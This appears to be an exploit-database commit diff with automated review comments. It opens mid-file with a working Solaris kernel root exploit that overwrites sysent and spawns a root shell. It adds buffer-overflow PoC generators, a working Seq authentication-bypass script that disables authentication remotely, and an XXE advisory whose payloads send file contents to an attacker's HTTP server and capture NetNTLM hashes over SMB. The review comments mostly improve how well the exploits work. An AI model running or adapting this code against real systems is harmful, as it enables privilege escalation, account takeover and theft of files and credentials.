"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008-2017!@$!\n\n");
fd = open ("/dev/sdbc", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: failed opening /dev/sdbc\n", argv[0]);
return (EXIT_FAILURE);
}
memset (&sysent, 0, sizeof (sysent));
sysent.sy_narg = 0;
sysent.sy_flags = 0;
sysent.sy_call = pown_kernel;
sysent.sy_lock = pown_kernel;
sysent.sy_callc = pown_kernel;
devarrayp = resolve_kernsymbl ("devarray");
if (devarrayp == NULL)
{
fprintf (stderr, "%s: failed resolving &devarray\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp = resolve_kernsymbl ("sysent");
if (sysentp == NULL)
{
fprintf (stderr, "%s: failed resolving &sysent\n", argv[0]);
return (EXIT_FAILURE);
}
/* devarray elements are 256-bytes in size, so we can only write at an offset
* aligned to devarrayp & 0xff */
targetp = (void *) (((long) sysentp & ~0xFF) | ((long) devarrayp & 0xFF));
targetp += 0x1700;
sysindx = ((long) targetp - (long) sysentp) / sizeof (sysent);
devindx = ((char *) targetp - (char *) devarrayp) / 256;
devindx = (long) LONG_MIN + devindx;
ptr = mmap (NULL, PAGESIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == (void *) -1)
{
fprintf (stderr, "failed mmap\n");
return (EXIT_FAILURE);
}
memset (ptr, 0, PAGESIZE);
align = ((long) sysentp & 0x0F) - ((long) devarrayp & 0x0F);
if (align < 0)
align = -align;
memcpy ((ptr + PAGESIZE) - sizeof (sysent) - align, &sysent, sizeof (sysent));
memset (&sdbc_ioctl, 0, sizeof (sdbc_ioctl));
sdbc_ioctl.arg0 = (long) (ptr + PAGESIZE) - sizeof (sysent);
sdbc_ioctl.arg1 = devindx;
sdbc_ioctl.arg2 = sizeof (sysent) * 2;
#ifdef _LP64
printf ("* devarray: 0x%016lX, sysent: 0x%016lX, target: 0x%016lX\n", (long) devarrayp, (long) sysentp, (long) targetp);
printf ("* devarray idx: %ld %016lX\n", devindx, devindx);
#else
printf ("* devarray: 0x%08lX, sysent: 0x%08lX, target: 0x%08lX\n", (long) devarrayp, (long) sysentp, (long) targetp);
printf ("* devarray idx: %ld %08lX\n", devindx, devindx);
#endif
printf ("* sysent idx: %u\n", sysindx);
printf ("\n* overwriting... ");
n = ioctl (fd, SDBC_TEST_INIT, &sdbc_ioctl);
if (n != -1)
{
printf ("failed, ouch (%d)\n", n);
return (EXIT_FAILURE);
}
printf ("done\n");
printf ("* jumping... ");
syscall (sysindx);
printf ("done\n");
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
char *args[2] = { "/bin/sh", NULL };
printf ("+Wh00t\n\n");
execve (args[0], args, NULL);
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}
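Review bot: As committed this file does not build: the advisory wrapper `/*` on the first line is closed by the ` */` that ends sdbc-testinit.c's own header comment, so the first program becomes live code, the later ` */` preceding sdbc-testinit-v2.c is a stray token, and `_sysent_t`, `pown_kernel`, `resolve_kernsymbl` and `main` are then defined twice. Either split it into two files as the original digit-labs URLs do, or add a note at the top such as `/* NOTE: extract sdbc-testinit-v2.c (from its header comment to end of file) into its own file before compiling */`. In v2, `if (n != -1)` treats a successful ioctl return as the failure case, which is intentional only if the SDBC_TEST_INIT handler is expected to report an error after the out-of-bounds devarray write has already landed — a comment stating that expectation would help, since the check is the opposite of the usual idiom. The hard-coded `targetp += 0x1700`, `KTHREAD` and `t_cred` offsets are build-specific; recording the exact kernel build they were taken from would make the "Tested on" line actionable.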

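--- a/exploits/windows/local/45120.py
+++ b/exploits/windows/local/45120.py
@@ -0,0 +1,32 @@
+# Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC
+# Vulnerability Type: SEH Overwrite POC
+# Discovery by: Shubham Singh
+# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
+# Discovey Date: 2018-08-01
+# Software Link: http://www.alloksoft.com/fast_splitter.htm
+# Tested Version: 1.2
+# Tested on OS: Windows XP Service Pack 3 x86
+# Steps to Reproduce:
+# Run the python exploit.py , Open "exploit.txt" and copy content.
+# Open Fast AVI MPEG Splitter , A registration prompt will appear.
+# In the License field paste the content of "exploit.txt".
+# Press "OK" and B00m Crashed.
+#!/usr/bin/env python
+# SEH chain of main thread, item 0
+# Address=00129B78
+# SE handler=43434343
+# SEH chain of main thread, item 1
+# Address=42424242
+# SE handler=*** CORRUPT ENTRY ***
+buffer = "\x41" * 544
+nseh = "\x42\x42\x42\x42"
+seh= "\x43\x43\x43\x43"
+exploit = buffer + nseh + seh
+f = open ("exploit.txt", "w")
+f.write(exploit)
+f.close()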
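Review bot: The `#!/usr/bin/env python` line sits after the comment header rather than on line 1, so it is not a shebang and `./45120.py` will not run; move it to the first line or drop it, since the steps already invoke `python exploit.py`. The file write should be `with open("exploit.txt", "w") as f: f.write(exploit)` so the handle is closed even if the write fails. The SEH dump in the comments (`SE handler=43434343`, item 1 `Address=42424242`) fixes the offset to the SEH record at 544 bytes; stating that offset in the header, and that no controlled redirection beyond the overwrite was attempted, makes the PoC's claim checkable.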

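--- a/exploits/windows/local/45137.py
+++ b/exploits/windows/local/45137.py
@@ -0,0 +1,24 @@
+# Exploit Title: AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-08-02
+# Vendor Homepage: http://agatasoft.com/
+# Software Link : http://agatasoft.com/Ping_Master.exe
+# Tested Version: 1.5
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+# Steps to Produce the Crash:
+# 1.- Run python code : python AgataSoft_Auto_PingMaster_1.5.py
+# 2.- Open AgataSoft_Auto_PingMaster_1.5.txt and copy content to clipboard
+# 3.- Open Ping_Master.exe
+# 4.- Trace Route
+# 5.- Paste ClipBoard on "Host name:"
+# 6.- Get IP from host name
+# 7.- Crashed
+#!/usr/bin/env python
+buffer = "\x41" * 742
+f = open ("AgataSoft_Auto_PingMaster_1.5.txt", "w")
+f.write(buffer)
+f.close()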
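Review bot: `#!/usr/bin/env python` is placed after the comment block, so it has no effect as a shebang; put it on line 1 or remove it, since the steps call the interpreter explicitly. Use `with open("AgataSoft_Auto_PingMaster_1.5.txt", "w") as f: f.write(buffer)` so the file is closed on every path, and rename `buffer`, which shadows a Python 2 builtin. The header calls this a Denial of Service, but a 742-byte filler crash with no register or SEH dump only shows that the application crashes — the advisory should say that exploitability beyond the crash was not assessed.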


@ -0,0 +1,82 @@
# Exploit Title: Seq 4.2.476 - Authentication Bypass
# Date: 2018-08-02
# Exploit Author: Daniel Chactoura
# Vendor Homepage: https://getseq.net/
# Software Link: https://getseq.net/Download/All
# Version: <= 4.2.476
# CVE : CVE-2018-8096
# Post Reference: https://medium.com/stolabs/bypass-admin-authentication-on-seq-17f0f9e02732
# coding=utf-8
#!/bin/python
import sys
import requests
def verifyArgs(args):
if len(args) < 2:
print('[!] Usage: '+str(args[0])+' https://target')
exit(0)
elif 'http' not in str(args[1]):
print('''[!] Missing "https://" !''')
exit(0)
else:
return(1)
def verifyVersion(url):
vulnVersions = ['4.2.476','4.2.470','4.1.17','4.1.16',
'4.1.14','4.0.60','4.0.58','3.4.20',
'3.4.18','3.4.17','3.3.23','3.3.22',
'3.3.21','3.3.20','3.2.16','3.1.17',
'3.1.16','3.0.30','2.4.2','2.3.4',
'2.3.3','2.2.8','2.1.22','2.1.21',
'2.0.19','1.6.13','1.6.12','1.6.11',
'1.6.10','1.6.9','1.6.8','1.6.7',
'1.6.6','1.6.5','1.6.4','1.5.19',
'1.5.18','1.5.17','1.5.16','1.4.12',
'1.4.11','1.4.10','1.4.9','1.4.8',
'1.4.7','1.4.6','1.3.11','1.3.10',
'1.3.9','1.3.8']
u = str(url)
verifV = requests.get(u+'/api/')
verifVJSON = verifV.json()
ver = str(verifVJSON['Version'])[:-2]
if ver in vulnVersions:
print("[+] Seq's version is potentially vulnerable!")
return(1)
else:
print("[!] Seq's version is probably not vulnerable!")
return(0)
def bypassAuth(url):
u = str(url)
payload = "{'Name':'isauthenticationenabled','Value':false,'Id':'setting-isauthenticationenabled','Links':{'Self':'api/settings/setting-isauthenticationenabled','Group':'api/settings/resources'}}"
h = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0', 'Referer':u}
verifM = requests.put(u+'/api/settings/setting-isauthenticationenabled', data=payload, headers=h)
verifMCode = str(verifM.status_code)
if verifMCode == '200':
print("[:)] YES! Success! Now, access the url and have fun!")
else:
print("[:(] DAMN! This is not your lucky day...")
def main():
try:
if verifyArgs(sys.argv):
if verifyVersion(sys.argv[1]):
bypassAuth(sys.argv[1])
else:
c = input('[?] Do you want to try it anyway? (y/n): ').lower()
if c == 'y':
pass
elif c == 'n':
exit(0)
else:
print('[!] Invalid choice!')
exit(0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
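Review bot: The "try it anyway" prompt in `main()` is a no-op: answering `y` executes `pass` and the script exits without ever calling the bypass, so the branch should be `if c == 'y': bypassAuth(sys.argv[1])`. `verifyArgs` rejects arguments that do not contain `http` but the message says `Missing "https://"` — align the check and the text, since plain `http://` targets pass it. The PUT body in `bypassAuth` is a single-quoted Python-style string sent with no `Content-Type`, so it only works if the server's JSON parser is lenient; pass a real object via `requests.put(..., json={...})` instead. `str(verifVJSON['Version'])[:-2]` assumes a four-component version string and will mangle anything else, so compare on a parsed prefix rather than a fixed slice. Operators should also note that this PUT turns authentication off for the whole Seq instance — read the current `setting-isauthenticationenabled` value first so it can be restored after testing.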


@ -0,0 +1,139 @@
Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing
Reserved CVE: CVE-2018-13416
# Vulnerability Overview
The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use this vulnerability to:
- Access arbitrary files from the filesystem with the same permission as the user account running UMS.
- Initiate SMB connections to capture NetNTLM challenge/response and crack to clear-text password.
- Initiate SMB connections to relay NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
Exploitation can be demonstrated using evil-ssdp (https://gitlab.com/initstring/evil-ssdp).
# Discovered By
Chris Moberly @ The Missing Link Security
# Vendor Status
UMS team responded to notification within an hour, patch in progress.
# Vulnerability Details
Atack type: Remote, unauthenticated
Impact: Information disclosure up to code execution
Affected component: UMS's SSDP discovery / XML parsing
Operating Systems affected: Verified Windows 10 (likely all versions)
UMS version affected: Tested on 7.1.0 (current as of July 2018). Older versions likely also vulnerable.
Attack vector: XXE
# Technical Overview
UMS, like many other media servers, will attempt to discover other devices on a local network. The discovery process is handled by Simple Service Discovery Protocol (SSDP), which sends a UDP multicast out to 239.255.255.250 on port 1900. This is the first step in finding and adding Universal Plug and Play (UPNP) devices.
We can reply to that UDP multicast directly on the same port that the request initiated from, informing this client that we have a shared device. When we do this, we provide the location of an XML file containing more information about our device. This is called a Device Descriptor.
UMS will automatically access the Device Descriptor over HTTP, parsing the XML content. This is expected behaviour for SSDP/UPNP.
By hosting a specially crafted XML file at that location, we can force UMS to do several things. The POC used to prove this vulnerability (POC 1 below) contained the following XML content:
```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
```
When UMS parses this, it does two things:
1. Accesses the SMB share running at the $smbServer variable. This allows us to collect or relay the NetNTLM challenge/response.
2. Accesses an HTTP server at the $localIp variable. This is used for verification purposes while testing the vulnerability.
The unexpected behaviour here is the ability to provide the `ENTITY` tags, forcing UMS to automatically access file paths and HTTP URLs.
# POC 1: Capcturing NetNTLM Challenge/Response
This is a common attack method inside a Windows domain, where compromising an account can assist with moving laterally through the network.
This vulnerability can be easily validated using the [evil-ssdp tool found here](https://gitlab.com/initstring/evil-ssdp).
The process is:
1. Execute the evil-ssdp tool as follows from a Linux host:
```
essdp.py eth0 -t xxe-smb # instructs tool to use the 'xxe' template for zero-day hunting
```
2. From the same Linux host, either launch a simple netcat listener like this:
```
sudo nc -nlvp 445
```
or use Impacket to listen and extract the NetNTLM challenge/response as follows:
```
sudo python examples/smbserver.py smb /tmp/smb/
```
3. From a Windows host on the same network, simply restart UMS. evil-ssdp will display messages like the following:
```
[XML REQUEST] Host: 10.0.200.10, User-Agent: UMS/7.1.0 Windows10/10.0 UPnP/1.0 Cling/2.0
GET /ssdp/device-desc.xml
```
When that happens, either the netcat listener or the Impacket SMB server will receive the connection. If using Impacket, you will now have the NetNTLM challenge/response of the user running UMS. This can be cracked to clear-text using tools like Hashcat. Alternatively, you can use Impacket to relay that hash to another machine on the network, achieving remote code execution.
# POC 2: Accessing Arbitrary Files
If an attacker knows specifically what files they are looking for, this same vulnerability can be used to extract that information. Essentially, an XML entity will be defined as a variable, storing the output of a file on the machine where UMS is installed. Then, an HTTP request will be sent to the attacker's machine that includes that variable. The attacker will be able to see this file in their HTTP server logs.
We need two files hosted on the attacking server to do this. The initial Device Descriptor sent is:
```
<!DOCTYPE data[
<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
%dtd;
]>
<data>&send;</data>
```
Which triggers another connection request to the following data.dtd file:
```
<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
%all;
```
We can also verify this using the evil-ssdp tool, using the 'xxe-exfil' template. For this POC, only extraction of 1-line files was found to be possible.
To reproduce:
1. Create a test file 'C:\Users\Public\pwned.txt' on the Windows hosts where UMS is installed. Please 1 line of text with no whitespaces inside, like this:
```
secretstuff!
```
2. Execute the evil-ssdp tool as follows from a Linux host on the same network:
```
essdp.py eth0 -t xxe-exfil # instructs tool to use the 'xxe-exfil' template for zero-day hunting
```
3. Back on the Windows host, simply restart UMS. evil-ssdp will display messages like the following
```
[XML REQUEST] Host: 10.0.200.10, User-Agent: UMS/7.1.0 Windows10/10.0 UPnP/1.0 Cling/2.0
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 10.0.200.10, User-Agent: Java/1.8.0_171
GET /ssdp/data.dtd
[EXFILTRATION] Host: 10.0.200.10, User-Agent: Java/1.8.0_171
GET /?exfiltrated=secretstuff!
```


@ -9840,11 +9840,16 @@ id,file,description,date,author,type,platform,port
45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,
45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux,
45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,
45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS - Local Kernel root Exploit",2018-08-02,mu-b,local,solaris,
45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45089,exploits/linux/local/45089.py,"Intenos IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
45101,exploits/windows/local/45101.py,"Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)",2018-07-30,"Shubham Singh",local,windows,
45120,exploits/windows/local/45120.py,"Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC)",2018-08-01,"Shubham Singh",local,windows,
45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,
45137,exploits/windows/local/45137.py,"AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)",2018-08-02,"Luis Martínez",local,windows,
45130,exploits/linux/local/45130.py,"Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation",2018-08-02,0x09AL,local,linux,
45132,exploits/linux/local/45132.rb,"SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)",2018-08-02,0x09AL,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39588,7 +39593,7 @@ id,file,description,date,author,type,platform,port
44786,exploits/php/webapps/44786.txt,"Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection",2018-05-28,L0RD,webapps,php,
44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,
44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,80
44792,exploits/asp/webapps/44792.txt,"IssueTrak 7.0 - SQL Injection",2018-05-29,"Chris Anastasio",webapps,asp,
44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,
44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware,
@ -39721,6 +39726,7 @@ id,file,description,date,author,type,platform,port
45083,exploits/php/webapps/45083.rb,"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)",2018-07-24,"Mehmet Ince",webapps,php,
45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
45073,exploits/linux/webapps/45073.txt,"Synology DiskStation Manager 4.1 - Directory Traversal",2018-07-23,"Berk Dusunur",webapps,linux,
45125,exploits/php/webapps/45125.txt,"Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
@ -39728,3 +39734,10 @@ id,file,description,date,author,type,platform,port
45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,
45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
45127,exploits/php/webapps/45127.html,"WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)",2018-08-02,"Porhai Eung",webapps,php,80
45128,exploits/php/webapps/45128.txt,"TI Online Examination System v2 - Arbitrary File Download",2018-08-02,AkkuS,webapps,php,80
45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80
45131,exploits/php/webapps/45131.py,"CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection",2018-08-02,0x09AL,webapps,php,
45133,exploits/xml/webapps/45133.txt,"Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection",2018-08-02,"Chris Moberly",webapps,xml,
45135,exploits/hardware/webapps/45135.txt,"ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution",2018-08-02,"Fakhri Zulkifli",webapps,hardware,
45136,exploits/windows/webapps/45136.py,"Seq 4.2.476 - Authentication Bypass",2018-08-02,"Daniel Chactoura",webapps,windows,
